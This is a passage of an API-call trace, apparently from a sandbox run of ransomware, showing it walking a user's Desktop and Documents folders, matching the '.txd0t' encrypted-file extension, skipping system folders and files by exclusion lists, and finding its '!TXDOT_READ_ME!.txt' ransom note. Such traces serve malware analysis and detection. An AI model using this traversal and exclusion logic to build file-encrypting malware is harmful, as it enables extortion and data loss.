(pszPath="VCbe_Sa0NEidgDcyfgFz.flv.txd0t") returned=".txd0t" [0090.060] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.092] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c70bd0, ftCreationTime.dwHighDateTime=0x1d5ea5f, ftLastAccessTime.dwLowDateTime=0x2b6dbb40, ftLastAccessTime.dwHighDateTime=0x1d5f071, ftLastWriteTime.dwLowDateTime=0x5124d96b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x39d5, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Vn Oo.gif.txd0t", cAlternateFileName="VNOOGI~1.TXD")) returned 1 [0090.092] StrCmpW (psz1="Vn Oo.gif.txd0t", psz2=".") returned 1 [0090.092] StrCmpW (psz1="Vn Oo.gif.txd0t", psz2="..") returned 1 [0090.092] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.092] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.092] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="Vn Oo.gif.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif.txd0t" [0090.092] PathFindExtensionW (pszPath="Vn Oo.gif.txd0t") returned=".txd0t" [0090.092] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.092] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf874130, ftCreationTime.dwHighDateTime=0x1d5e4bc, ftLastAccessTime.dwLowDateTime=0xae3a4210, ftLastAccessTime.dwHighDateTime=0x1d5e940, ftLastWriteTime.dwLowDateTime=0x5124d96b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16b8a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="WDZdqCHFFcmh9_.mp3.txd0t", cAlternateFileName="WDZDQC~1.TXD")) returned 1 [0090.092] StrCmpW (psz1="WDZdqCHFFcmh9_.mp3.txd0t", psz2=".") returned 1 [0090.092] StrCmpW (psz1="WDZdqCHFFcmh9_.mp3.txd0t", psz2="..") returned 1 [0090.092] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.093] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.093] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="WDZdqCHFFcmh9_.mp3.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3.txd0t" [0090.093] PathFindExtensionW (pszPath="WDZdqCHFFcmh9_.mp3.txd0t") returned=".txd0t" [0090.093] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.093] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecb52350, ftCreationTime.dwHighDateTime=0x1d5ec3a, ftLastAccessTime.dwLowDateTime=0xf8088120, ftLastAccessTime.dwHighDateTime=0x1d5e8b1, ftLastWriteTime.dwLowDateTime=0x51278258, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x19cb, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="wO3YP7g6H.wav.txd0t", cAlternateFileName="WO3YP7~1.TXD")) returned 1 [0090.093] StrCmpW (psz1="wO3YP7g6H.wav.txd0t", psz2=".") returned 1 [0090.093] StrCmpW (psz1="wO3YP7g6H.wav.txd0t", psz2="..") returned 1 [0090.093] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.093] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.093] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="wO3YP7g6H.wav.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav.txd0t" [0090.093] PathFindExtensionW (pszPath="wO3YP7g6H.wav.txd0t") returned=".txd0t" [0090.093] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.093] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bf8ae50, ftCreationTime.dwHighDateTime=0x1d5e184, ftLastAccessTime.dwLowDateTime=0xb2d1f1a0, ftLastAccessTime.dwHighDateTime=0x1d5e1f8, ftLastWriteTime.dwLowDateTime=0x51278258, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xee63, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="yn-OCsN4T3Jmv.wav.txd0t", cAlternateFileName="YN-OCS~1.TXD")) returned 1 [0090.093] StrCmpW (psz1="yn-OCsN4T3Jmv.wav.txd0t", psz2=".") returned 1 [0090.093] StrCmpW (psz1="yn-OCsN4T3Jmv.wav.txd0t", psz2="..") returned 1 [0090.093] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.093] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.093] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="yn-OCsN4T3Jmv.wav.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav.txd0t" [0090.093] PathFindExtensionW (pszPath="yn-OCsN4T3Jmv.wav.txd0t") returned=".txd0t" [0090.093] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.093] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x378b4220, ftCreationTime.dwHighDateTime=0x1d5ea0f, ftLastAccessTime.dwLowDateTime=0x50cd2da0, ftLastAccessTime.dwHighDateTime=0x1d5f088, ftLastWriteTime.dwLowDateTime=0x51299e42, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xbe34, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Zau1_Q_6PWntC.gif.txd0t", cAlternateFileName="ZAU1_Q~1.TXD")) returned 1 [0090.093] StrCmpW (psz1="Zau1_Q_6PWntC.gif.txd0t", psz2=".") returned 1 [0090.093] StrCmpW (psz1="Zau1_Q_6PWntC.gif.txd0t", psz2="..") returned 1 [0090.093] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.093] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.093] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="Zau1_Q_6PWntC.gif.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif.txd0t" [0090.093] PathFindExtensionW (pszPath="Zau1_Q_6PWntC.gif.txd0t") returned=".txd0t" [0090.093] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.093] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a8b3a60, ftCreationTime.dwHighDateTime=0x1d5e9cf, ftLastAccessTime.dwLowDateTime=0xb6208b00, ftLastAccessTime.dwHighDateTime=0x1d5eaf9, ftLastWriteTime.dwLowDateTime=0x51299e42, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4ae1, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ZSfJsNS2sePMKa.pps.txd0t", cAlternateFileName="ZSFJSN~1.TXD")) returned 1 [0090.094] StrCmpW (psz1="ZSfJsNS2sePMKa.pps.txd0t", psz2=".") returned 1 [0090.094] StrCmpW (psz1="ZSfJsNS2sePMKa.pps.txd0t", psz2="..") returned 1 [0090.094] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.094] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.094] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="ZSfJsNS2sePMKa.pps.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps.txd0t" [0090.094] PathFindExtensionW (pszPath="ZSfJsNS2sePMKa.pps.txd0t") returned=".txd0t" [0090.094] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.094] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa54e95c0, ftCreationTime.dwHighDateTime=0x1d5eb66, ftLastAccessTime.dwLowDateTime=0xad201040, ftLastAccessTime.dwHighDateTime=0x1d5e331, ftLastWriteTime.dwLowDateTime=0x512c0027, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x912f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ztT1zUqOHSnYLoXvx2_E.csv.txd0t", cAlternateFileName="ZTT1ZU~1.TXD")) returned 1 [0090.094] StrCmpW (psz1="ztT1zUqOHSnYLoXvx2_E.csv.txd0t", psz2=".") returned 1 [0090.094] StrCmpW (psz1="ztT1zUqOHSnYLoXvx2_E.csv.txd0t", psz2="..") returned 1 [0090.095] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.095] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.095] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="ztT1zUqOHSnYLoXvx2_E.csv.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv.txd0t" [0090.095] PathFindExtensionW (pszPath="ztT1zUqOHSnYLoXvx2_E.csv.txd0t") returned=".txd0t" [0090.095] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.095] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa54e95c0, ftCreationTime.dwHighDateTime=0x1d5eb66, ftLastAccessTime.dwLowDateTime=0xad201040, ftLastAccessTime.dwHighDateTime=0x1d5e331, ftLastWriteTime.dwLowDateTime=0x512c0027, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x912f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ztT1zUqOHSnYLoXvx2_E.csv.txd0t", cAlternateFileName="ZTT1ZU~1.TXD")) returned 0 [0090.095] FindClose (in: hFindFile=0xec2330 | out: hFindFile=0xec2330) returned 1 [0090.095] GetProcessHeap () returned 0xe30000 [0090.095] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec75a0 | out: hHeap=0xe30000) returned 1 [0090.095] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x51d84a4b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51d84a4b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0090.095] StrCmpW (psz1="Documents", psz2=".") returned 1 [0090.095] StrCmpW (psz1="Documents", psz2="..") returned 1 [0090.095] StrCpyNW (in: psz1=0xec60f0, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0090.095] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0090.095] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Documents", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.095] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\windows\\system32\\") returned 0x0 [0090.095] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.095] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\windows\\system\\") returned 0x0 [0090.095] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.095] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.095] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\appdata\\local\\") returned 0x0 [0090.095] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.095] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.095] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.095] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\boot\\") returned 0x0 [0090.095] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\perflogs\\") returned 0x0 [0090.095] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\programdata\\") returned 0x0 [0090.095] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\drivers\\") returned 0x0 [0090.095] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\wsus\\") returned 0x0 [0090.095] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.095] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.096] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="crypt_detect") returned 0x0 [0090.096] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="cryptolocker") returned 0x0 [0090.096] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="ransomware") returned 0x0 [0090.096] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="C:\\WINDOWS") returned 0x0 [0090.096] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.096] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="C:\\Program Files") returned 0x0 [0090.096] GetProcessHeap () returned 0xe30000 [0090.096] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xec75a0 [0090.096] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.096] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\*") returned="C:\\Users\\FD1HVy\\Documents\\*" [0090.096] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x51d84a4b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51d84a4b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2630 [0090.096] StrCmpW (psz1=".", psz2=".") returned 0 [0090.096] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x51d84a4b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51d84a4b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.096] StrCmpW (psz1="..", psz2=".") returned 1 [0090.096] StrCmpW (psz1="..", psz2="..") returned 0 [0090.096] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x512e61c6, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x512e61c6, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5130c4da, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.096] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.096] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.096] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.096] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.096] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt" [0090.096] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.096] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.096] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.096] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.096] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.096] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.097] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.097] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.097] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.097] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.097] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.097] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.097] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.097] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.097] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.097] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.097] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26df0010, ftCreationTime.dwHighDateTime=0x1d59cda, ftLastAccessTime.dwLowDateTime=0xd76e9320, ftLastAccessTime.dwHighDateTime=0x1d5dd83, ftLastWriteTime.dwLowDateTime=0x512e61c6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9dae, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="-nk0Jwf_DtIx7OFnM.xlsx.txd0t", cAlternateFileName="-NK0JW~1.TXD")) returned 1 [0090.097] StrCmpW (psz1="-nk0Jwf_DtIx7OFnM.xlsx.txd0t", psz2=".") returned 1 [0090.097] StrCmpW (psz1="-nk0Jwf_DtIx7OFnM.xlsx.txd0t", psz2="..") returned 1 [0090.097] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.097] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.097] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="-nk0Jwf_DtIx7OFnM.xlsx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx.txd0t" [0090.097] PathFindExtensionW (pszPath="-nk0Jwf_DtIx7OFnM.xlsx.txd0t") returned=".txd0t" [0090.097] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.097] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd5ddbb0, ftCreationTime.dwHighDateTime=0x1d58f75, ftLastAccessTime.dwLowDateTime=0x9feb6c70, ftLastAccessTime.dwHighDateTime=0x1d57776, ftLastWriteTime.dwLowDateTime=0x512e61c6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf5c7, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="1WQmayKDv.pptx.txd0t", cAlternateFileName="1WQMAY~1.TXD")) returned 1 [0090.097] StrCmpW (psz1="1WQmayKDv.pptx.txd0t", psz2=".") returned 1 [0090.097] StrCmpW (psz1="1WQmayKDv.pptx.txd0t", psz2="..") returned 1 [0090.097] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.097] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.097] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="1WQmayKDv.pptx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx.txd0t" [0090.097] PathFindExtensionW (pszPath="1WQmayKDv.pptx.txd0t") returned=".txd0t" [0090.097] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.097] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe5cd300, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x446fea50, ftLastAccessTime.dwHighDateTime=0x1d59d74, ftLastWriteTime.dwLowDateTime=0x5130c4da, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18c63, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="27kj6w0qCAmGPNM.docx.txd0t", cAlternateFileName="27KJ6W~1.TXD")) returned 1 [0090.097] StrCmpW (psz1="27kj6w0qCAmGPNM.docx.txd0t", psz2=".") returned 1 [0090.097] StrCmpW (psz1="27kj6w0qCAmGPNM.docx.txd0t", psz2="..") returned 1 [0090.097] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.097] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.097] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="27kj6w0qCAmGPNM.docx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx.txd0t" [0090.097] PathFindExtensionW (pszPath="27kj6w0qCAmGPNM.docx.txd0t") returned=".txd0t" [0090.097] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.097] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb38f350, ftCreationTime.dwHighDateTime=0x1d57bb4, ftLastAccessTime.dwLowDateTime=0xfe7a2f50, ftLastAccessTime.dwHighDateTime=0x1d567f0, ftLastWriteTime.dwLowDateTime=0x51332989, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1373b, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="4oSJqKCx.docx.txd0t", cAlternateFileName="4OSJQK~1.TXD")) returned 1 [0090.098] StrCmpW (psz1="4oSJqKCx.docx.txd0t", psz2=".") returned 1 [0090.098] StrCmpW (psz1="4oSJqKCx.docx.txd0t", psz2="..") returned 1 [0090.098] 